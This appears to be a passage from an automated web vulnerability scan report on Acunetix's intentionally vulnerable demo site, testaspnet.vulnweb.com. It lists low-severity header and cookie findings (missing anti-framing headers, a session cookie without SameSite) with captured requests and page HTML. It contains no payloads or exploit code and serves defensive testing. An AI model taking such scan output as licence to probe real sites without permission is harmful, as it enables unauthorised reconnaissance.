previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Instances	30
Solution	Modern Web browsers support the Content-Security-Policy and X-Frame-Options HTTP headers. Ensure one of them is set on all web pages returned by your site/app. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
Reference	https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
Tags	OWASP_2021_A05 WSTG-v42-CLNT-09 OWASP_2017_A06
CWE Id	1021
WASC Id	15
Plugin Id	10020

Low	Cookie without SameSite Attribute
Description	A cookie has been set without the SameSite attribute, which means that the cookie can be sent as a result of a 'cross-site' request. The SameSite attribute is an effective counter measure to cross-site request forgery, cross-site script inclusion, and timing attacks.

URL	http://testaspnet.vulnweb.com
Method	GET
Parameter	ASP.NET_SessionId
Attack
Evidence	Set-Cookie: ASP.NET_SessionId
Show / hide Request and Response
Request Header - size: 219 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter	ASP.NET_SessionId
Attack
Evidence	Set-Cookie: ASP.NET_SessionId
Show / hide Request and Response
Request Header - size: 220 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=p2ttr345zecuqfmoxygyermi; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" 